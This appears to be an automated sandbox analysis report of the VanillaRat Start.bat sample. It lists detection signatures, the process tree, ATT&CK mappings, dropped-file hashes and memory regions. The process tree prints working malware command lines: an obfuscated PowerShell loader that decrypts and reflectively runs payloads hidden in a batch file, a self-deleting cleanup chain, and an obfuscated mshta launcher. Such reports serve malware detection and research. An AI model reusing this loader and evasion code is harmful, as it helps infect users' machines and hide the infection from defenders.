Analysis

  • max time kernel
    146s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-10-2023 20:13

General

  • Target

    VanillaRat/Start.bat

  • Size

    3KB

  • MD5

    78d817fe7349683c207f17c0b4774484

  • SHA1

    9dc66330a6aef8e8678b45ac3fa79091f2f50ccc

  • SHA256

    b7ddf09d72ad1671da5c5ad5bf0e5d22ac6f4fee8cedd04f188a9e109e8b86f6

  • SHA512

    77e0bdc2d0faa24d4f4ff42059f8b002b7214300fd7f44b07d76fb042b111a1ad85e2b32e1032942aaf29bed11efe17a73e623cafd777ec21e603118e70d2699

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:620
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{01ec52bc-afe1-41ee-90d9-289da2193cb4}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2500
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{9fcb8ade-53a3-4c52-8e47-77b36d962750}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3780
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\VanillaRat\Start.bat"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:2044
      • C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe
        Main\\VanillaRat.exe
        2⤵
          PID:1784
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -WindowStyle Hidden -command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\VanillaRat\\\Handlers\\HandlerInstaller.bat' -WindowStyle Hidden -Wait}"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1084
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat" "
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4020
            • C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
              "HandlerInstaller.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function VROas($YFEKm){ $EnJnq=[System.Security.Cryptography.Aes]::Create(); $EnJnq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $EnJnq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $EnJnq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+mgHoM3Dd8LE9FhelB1+E49NCwweh3qyJF1GxhCe+k0='); $EnJnq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wwm30jhzkHC4/5SnlEDZGA=='); $pWYkp=$EnJnq.CreateDecryptor(); $return_var=$pWYkp.TransformFinalBlock($YFEKm, 0, $YFEKm.Length); $pWYkp.Dispose(); $EnJnq.Dispose(); $return_var;}function XcsVC($YFEKm){ $zQqyq=New-Object System.IO.MemoryStream(,$YFEKm); $emglC=New-Object System.IO.MemoryStream; $RGlqr=New-Object System.IO.Compression.GZipStream($zQqyq, [IO.Compression.CompressionMode]::Decompress); $RGlqr.CopyTo($emglC); $RGlqr.Dispose(); $zQqyq.Dispose(); $emglC.Dispose(); $emglC.ToArray();}function dnTmn($YFEKm,$CaEDQ){ $NmIfY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$YFEKm); $bqkrl=$NmIfY.EntryPoint; $bqkrl.Invoke($null, $CaEDQ);}$lpRaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat').Split([Environment]::NewLine);foreach ($aneut in $lpRaC) { if ($aneut.StartsWith('SEROXEN')) { $zZPSp=$aneut.Substring(7); break; }}$jGZnr=[string[]]$zZPSp.Split('\');$yHwYZ=XcsVC (VROas ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jGZnr[0])));$QcHAi=XcsVC (VROas ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jGZnr[1])));dnTmn $QcHAi (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dnTmn $yHwYZ (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
              4⤵
              • Suspicious use of NtCreateUserProcessOtherParentProcess
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Drops file in Windows directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2688
              • C:\Windows\SysWOW64\dllhost.exe
                C:\Windows\SysWOW64\dllhost.exe /Processid:{d2ce51a9-a5ae-449d-a6fd-ac314ed3df5f}
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3100
              • C:\Windows\SysWOW64\dllhost.exe
                C:\Windows\SysWOW64\dllhost.exe /Processid:{22ec52a2-41ad-464f-8e2a-90ef1700a6c8}
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1408
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe" & exit
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4276
                • C:\Windows\system32\PING.EXE
                  PING localhost -n 8
                  6⤵
                  • Runs ping.exe
                  PID:4920
                • C:\Windows\system32\taskkill.exe
                  taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe"
                  6⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2072
                • C:\Windows\system32\attrib.exe
                  ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe"
                  6⤵
                  • Views/modifies file attributes
                  PID:4004
      • C:\Windows\$sxr-mshta.exe
        C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-MkCCpgMZesGBgQjTHDjR4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
        1⤵
        • Executes dropped EXE
        PID:384
      • C:\Windows\system32\taskhostw.exe
        taskhostw.exe C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-MkCCpgMZesGBgQjTHDjR4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
        1⤵
          PID:4812

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Defense Evasion

        Hide Artifacts

        1
        T1564

        Hidden Files and Directories

        1
        T1564.001

        Discovery

        Query Registry

        2
        T1012

        System Information Discovery

        2
        T1082

        Remote System Discovery

        1
        T1018

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          64B

          MD5

          a6c9d692ed2826ecb12c09356e69cc09

          SHA1

          def728a6138cf083d8a7c61337f3c9dade41a37f

          SHA256

          a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

          SHA512

          2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

        • C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
          Filesize

          442KB

          MD5

          04029e121a0cfa5991749937dd22a1d9

          SHA1

          f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

          SHA256

          9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

          SHA512

          6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

        • C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
          Filesize

          442KB

          MD5

          04029e121a0cfa5991749937dd22a1d9

          SHA1

          f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

          SHA256

          9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

          SHA512

          6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ybmnfiz5.bef.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Windows\$sxr-mshta.exe
          Filesize

          14KB

          MD5

          0b4340ed812dc82ce636c00fa5c9bef2

          SHA1

          51c97ebe601ef079b16bcd87af827b0be5283d96

          SHA256

          dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

          SHA512

          d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

        • C:\Windows\$sxr-mshta.exe
          Filesize

          14KB

          MD5

          0b4340ed812dc82ce636c00fa5c9bef2

          SHA1

          51c97ebe601ef079b16bcd87af827b0be5283d96

          SHA256

          dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

          SHA512

          d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

        • C:\Windows\$sxr-powershell.exe
          Filesize

          442KB

          MD5

          04029e121a0cfa5991749937dd22a1d9

          SHA1

          f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

          SHA256

          9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

          SHA512

          6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

        • memory/1084-12-0x000002A3EC3E0000-0x000002A3EC3F0000-memory.dmp
          Filesize

          64KB

        • memory/1084-14-0x000002A3EC3E0000-0x000002A3EC3F0000-memory.dmp
          Filesize

          64KB

        • memory/1084-11-0x00007FFF03130000-0x00007FFF03BF1000-memory.dmp
          Filesize

          10.8MB

        • memory/1084-5-0x000002A3EC420000-0x000002A3EC442000-memory.dmp
          Filesize

          136KB

        • memory/1084-19-0x00007FFF03130000-0x00007FFF03BF1000-memory.dmp
          Filesize

          10.8MB

        • memory/1084-112-0x000002A3EC590000-0x000002A3EC6DE000-memory.dmp
          Filesize

          1.3MB

        • memory/1084-21-0x000002A3EC590000-0x000002A3EC6DE000-memory.dmp
          Filesize

          1.3MB

        • memory/1084-22-0x000002A3EC3E0000-0x000002A3EC3F0000-memory.dmp
          Filesize

          64KB

        • memory/1084-113-0x00007FFF03130000-0x00007FFF03BF1000-memory.dmp
          Filesize

          10.8MB

        • memory/1784-15-0x0000000005910000-0x0000000005EB4000-memory.dmp
          Filesize

          5.6MB

        • memory/1784-25-0x0000000005350000-0x0000000005360000-memory.dmp
          Filesize

          64KB

        • memory/1784-24-0x0000000006BD0000-0x0000000006D76000-memory.dmp
          Filesize

          1.6MB

        • memory/1784-23-0x00000000064C0000-0x00000000065A0000-memory.dmp
          Filesize

          896KB

        • memory/1784-20-0x00000000743F0000-0x0000000074BA0000-memory.dmp
          Filesize

          7.7MB

        • memory/1784-18-0x00000000052B0000-0x00000000052BA000-memory.dmp
          Filesize

          40KB

        • memory/1784-17-0x0000000005350000-0x0000000005360000-memory.dmp
          Filesize

          64KB

        • memory/1784-16-0x0000000005210000-0x00000000052A2000-memory.dmp
          Filesize

          584KB

        • memory/1784-13-0x00000000743F0000-0x0000000074BA0000-memory.dmp
          Filesize

          7.7MB

        • memory/1784-10-0x0000000000760000-0x0000000000928000-memory.dmp
          Filesize

          1.8MB

        • memory/1784-47-0x0000000005350000-0x0000000005360000-memory.dmp
          Filesize

          64KB

        • memory/2500-68-0x0000000140000000-0x0000000140004000-memory.dmp
          Filesize

          16KB

        • memory/2500-66-0x0000000140000000-0x0000000140004000-memory.dmp
          Filesize

          16KB

        • memory/2688-58-0x00007FFF0D6B0000-0x00007FFF0D6C9000-memory.dmp
          Filesize

          100KB

        • memory/2688-53-0x00007FFF21300000-0x00007FFF213BE000-memory.dmp
          Filesize

          760KB

        • memory/2688-45-0x000001E9EB0E0000-0x000001E9EB0F0000-memory.dmp
          Filesize

          64KB

        • memory/2688-54-0x000001E9EB260000-0x000001E9EB3AE000-memory.dmp
          Filesize

          1.3MB

        • memory/2688-55-0x000001E9802C0000-0x000001E980D0E000-memory.dmp
          Filesize

          10.3MB

        • memory/2688-48-0x000001E9EB260000-0x000001E9EB3AE000-memory.dmp
          Filesize

          1.3MB

        • memory/2688-49-0x000001E9EB0E0000-0x000001E9EB0F0000-memory.dmp
          Filesize

          64KB

        • memory/2688-59-0x000001E980D20000-0x000001E980DC4000-memory.dmp
          Filesize

          656KB

        • memory/2688-60-0x000001E980DD0000-0x000001E980E26000-memory.dmp
          Filesize

          344KB

        • memory/2688-61-0x000001E980E30000-0x000001E980E88000-memory.dmp
          Filesize

          352KB

        • memory/2688-62-0x000001E980E90000-0x000001E980EB2000-memory.dmp
          Filesize

          136KB

        • memory/2688-63-0x00007FFF215B0000-0x00007FFF217A5000-memory.dmp
          Filesize

          2.0MB

        • memory/2688-65-0x000001E981170000-0x000001E98117A000-memory.dmp
          Filesize

          40KB

        • memory/2688-51-0x000001E990000000-0x000001E990024000-memory.dmp
          Filesize

          144KB

        • memory/2688-39-0x00007FFF03130000-0x00007FFF03BF1000-memory.dmp
          Filesize

          10.8MB

        • memory/2688-52-0x00007FFF215B0000-0x00007FFF217A5000-memory.dmp
          Filesize

          2.0MB

        • memory/2688-40-0x000001E9EB0E0000-0x000001E9EB0F0000-memory.dmp
          Filesize

          64KB

        • memory/2688-46-0x000001E9EB0E0000-0x000001E9EB0F0000-memory.dmp
          Filesize

          64KB

        • memory/2688-44-0x00007FFF03130000-0x00007FFF03BF1000-memory.dmp
          Filesize

          10.8MB

        • memory/2688-79-0x000001E9EB260000-0x000001E9EB3AE000-memory.dmp
          Filesize

          1.3MB

        • memory/2688-85-0x00007FFF215B0000-0x00007FFF217A5000-memory.dmp
          Filesize

          2.0MB

        • memory/2688-86-0x00007FFF21300000-0x00007FFF213BE000-memory.dmp
          Filesize

          760KB

        • memory/2688-94-0x000001E9EB260000-0x000001E9EB3AE000-memory.dmp
          Filesize

          1.3MB

        • memory/2688-42-0x000001E9EB0E0000-0x000001E9EB0F0000-memory.dmp
          Filesize

          64KB

        • memory/2688-106-0x000001E9EB260000-0x000001E9EB3AE000-memory.dmp
          Filesize

          1.3MB

        • memory/2688-107-0x00007FFF03130000-0x00007FFF03BF1000-memory.dmp
          Filesize

          10.8MB

        • memory/2688-108-0x00007FFF0D6B0000-0x00007FFF0D6C9000-memory.dmp
          Filesize

          100KB

        • memory/2688-41-0x000001E9EB0E0000-0x000001E9EB0F0000-memory.dmp
          Filesize

          64KB

        • memory/3100-71-0x0000000000400000-0x0000000000406000-memory.dmp
          Filesize

          24KB

        • memory/3100-69-0x0000000000400000-0x0000000000406000-memory.dmp
          Filesize

          24KB